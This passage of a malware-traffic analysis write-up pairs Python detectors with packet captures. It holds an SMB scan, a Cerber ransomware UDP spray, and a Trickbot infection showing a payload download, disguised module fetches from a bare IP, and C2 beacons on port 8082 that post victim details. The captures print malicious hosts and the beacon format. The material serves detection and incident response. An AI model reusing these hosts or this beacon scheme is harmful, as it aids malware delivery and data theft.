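                best = (len(live), events[lo].ts, ev.ts, set(live))
        count, first, last, dsts = best
        if count >= min_targets:
            addrs = sorted(int(ipaddress.ip_address(a)) for a in dsts)
            contiguous = addrs[-1] - addrs[0] + 1 == count
            alerts.append(Alert(src, dport, kind, count, contiguous, first, last))
    return alerts


# Constructed sample: SMB probe burst from the capture (options trimmed),
# two inbound SYNs from other sources, one non-probe packet, and the
# Cerber UDP spray regenerated from the capture's address block.
SMB_LINES = [
    "2017-06-20 14:09:12.664927 IP 10.101.22.128.49739 > 221.184.213.149.445: Flags [S], seq 3893475975, win 8192, length 0",
    "2017-06-20 14:09:12.758627 IP 10.101.22.128.49741 > 212.104.117.73.445: Flags [S], seq 1202043706, win 8192, length 0",
    "2017-06-20 14:09:12.771825 IP 10.72.158.57.59199 > 10.101.21.107.445: Flags [S], seq 436800387, win 8192, length 0",
    "2017-06-20 14:09:12.785013 IP 172.20.31.74.64831 > 10.101.20.47.445: Flags [S], seq 347664739, win 8192, length 0",
    "2017-06-20 14:09:12.820839 IP 10.101.22.128.49743 > 118.239.76.174.445: Flags [S], seq 502529660, win 8192, length 0",
    "2017-06-20 14:09:12.867686 IP 10.101.22.128.49744 > 130.69.49.167.445: Flags [S], seq 839731710, win 8192, length 0",
    "2017-06-20 14:09:12.992756 IP 10.101.22.128.49746 > 152.222.186.96.445: Flags [S], seq 464388263, win 8192, length 0",
    "2017-06-20 14:09:13.039562 IP 10.101.22.128.49748 > 29.89.169.211.445: Flags [S], seq 855875173, win 8192, length 0",
    "2017-06-20 14:09:13.070724 IP 10.101.22.128.49749 > 152.100.211.153.445: Flags [S], seq 1583303698, win 8192, length 0",
    "2017-06-20 14:09:13.226796 IP 10.101.22.128.49752 > 187.236.46.149.445: Flags [S], seq 21748602, win 8192, length 0",
    "2017-06-20 14:09:13.258021 IP 10.101.22.128.49753 > 216.57.215.72.445: Flags [S], seq 4161335896, win 8192, length 0",
    "2017-06-20 14:09:13.320605 IP 10.101.22.128.49755 > 202.253.124.66.445: Flags [S], seq 2143311680, win 8192, length 0",
    "2017-06-20 14:09:13.461584 IP 10.101.22.128.49757 > 56.71.64.115.445: Flags [S], seq 868905440, win 8192, length 0",
    "2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP",
]
CERBER_LINES = [
    f"2016-10-18 14:41:31.{393471 + 10 * i:06d} IP 10.10.18.102.54101 > 31.184.234.{169 + i}.6892: UDP, length 9"
    for i in range(16)
]
SAMPLE_LINES = SMB_LINES + CERBER_LINES

if __name__ == "__main__":
    for a in detect_fanout(SAMPLE_LINES):
        print(f"{a.src} -> {a.targets} hosts on {a.kind}/{a.dport} in "
              f"{(a.last - a.first).total_seconds():.3f}s contiguous={a.contiguous}")
```

The contiguous flag is what separates the two cases: a worm-style scanner picks random internet addresses, while the Cerber client sprays every address of a configured block, so a contiguous fan-out on an unusual UDP port is a stronger ransomware check-in signal than the count alone.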

Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
E..s..@……..f.w.
…P\WQ..M^PP…-…GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
E..(………w.
…f.P…M^P\WQ.P…l………
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK
E.

…….$..w.

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
E..(..@….H…f.#.@.3.P.Fr.X.1.P….o……..
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…..@……..f.#.@.3.P.Fr.X.1.P…5…GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
E..(.w…..~.#.@…f.P.3X.1..FsLP………….
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

E….x…….#.@…f.P.3X.1..FsLP…\W..HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
E..(..@…w….f…..4.P.UsR.L.4P…h………
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
E…..@…v….f…..4.P.UsR.L.4P…….GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0
E..(.|………….f.P.4.L.4.Ut+P…g………

2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..( =@….p…fU….8.P#.k9.Q,.P………….
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
E… >@……..fU….8.P#.k9.Q,.P…….GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0
E..()+….2.U……f.P.8.Q,.#.k.P….*……..

2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
E..(B.@…]……..f…Ds7T.f ..P………….
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
E….N@……..fU….8.P#.k..W..P…./..GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

E..(..@….H…f.|…J....M....P...Q.........
2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230
E.....@....a...f.|...J....M….P….!..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0
E..(+……..|…..f…J….`..3P…P+……..

2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..(.z@… 3…fU….x.Py….Q..P………….
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
E..r.{@……..fU….x.Py….Q..P…w…GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@……..f.|…|..c.~….;P…-a..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0

E..(………|…..f…|…;c…P…-………

E..(..@……..f.|…}…W.Z….P…h………
2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
E..`..@….v…f.|…}…W.Z….P…I…POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229
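
The Trickbot sample above has three recognisable stages in its HTTP alone: the initial download of lop.bin with no User-Agent header, module pulls named like images (table.png, toler.png, worming.png) from a bare-IP host with the "WinHTTP loader/1.0" agent, and POST beacons on port 8082 whose path encodes the campaign tag, the victim's computer name, the Windows version (W617601 is Windows 6.1 build 7601) and a 32-hex client id, followed by a command number. The requests to identrust.com and windowsupdate.com in between are the ordinary CryptoAPI certificate fetches a Windows host makes when it first sees a new certificate chain, and should not be flagged. The Python below is an added example, not the author's tooling: it parses the beacon path into its fields and tags each request with the indicators it matches. The request tuples are rebuilt from the capture; the rule names and thresholds are my own.

```python
from __future__ import annotations

import re

# Beacon path layout seen in the capture:
#   /<group tag>/<COMPUTERNAME>_<W + Windows version and build>.<32-hex client id>/<command>[/]
BEACON_RE = re.compile(
    r"^/(?P<gtag>[A-Za-z0-9]+)/"
    r"(?P<hostname>[^_/]+)_(?P<osver>W\d+)\.(?P<client_id>[0-9A-Fa-f]{32})/"
    r"(?P<command>\d+)/?$"
)

# User-Agent strings the loader and the C2 client sent in the capture;
# neither is a browser.
LOADER_AGENTS = {"WinHTTP loader/1.0", "test"}


def parse_beacon_uri(uri: str) -> dict[str, str] | None:
    """Fields of a beacon path, or None when the path has another shape."""
    m = BEACON_RE.match(uri)
    return m.groupdict() if m else None


def host_is_ip_literal(host: str) -> bool:
    """True for "1.2.3.4" or "1.2.3.4:8082"; IPv4 only, which is all the capture needs."""
    parts = host.split(":")[0].split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) < 256 for p in parts)


def classify(method: str, host: str, uri: str, user_agent: str | None) -> list[str]:
    """Indicator tags for one request; an empty list means nothing matched."""
    findings = []
    beacon = parse_beacon_uri(uri)
    if beacon:
        findings.append(f"c2-beacon gtag={beacon['gtag']} host={beacon['hostname']} cmd={beacon['command']}")
    if user_agent in LOADER_AGENTS:
        findings.append(f"loader-user-agent {user_agent!r}")
    if method == "GET" and user_agent is None:
        findings.append("download-without-user-agent")
    if method == "GET" and host_is_ip_literal(host) and uri.lower().endswith((".png", ".bin")):
        findings.append("module-download-from-bare-ip")
    return findings


def triage(requests) -> dict[str, list[str]]:
    """Map each request path to its indicator tags."""
    return {uri: classify(method, host, uri, ua) for method, host, uri, ua in requests}


# Constructed from the capture above: (method, Host, path, User-Agent or None
# when the request carried no User-Agent header).
REQUESTS = [
    ("GET", "srienterprises.net", "/lop.bin", None),
    ("GET", "apps.identrust.com", "/roots/dstrootcax3.p7c", "Microsoft-CryptoAPI/6.1"),
    ("GET", "85.143.220.29", "/table.png", "WinHTTP loader/1.0"),
    ("POST", "188.124.167.132:8082",
     "/ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90", "test"),
    ("GET", "85.143.220.29", "/worming.png", None),
    ("POST", "188.124.167.132",
     "/ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/",
     "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"),
]

if __name__ == "__main__":
    for uri, tags in triage(REQUESTS).items():
        print(f"{uri}: {tags or 'clean'}")
```

The client id and computer name pulled out of the beacon path are the pivot an incident responder needs: the same id reappears in every later POST (commands 81 and 82 above), so one regex over proxy logs links the infected host, its campaign tag and the full beacon history even after the C2 address changes.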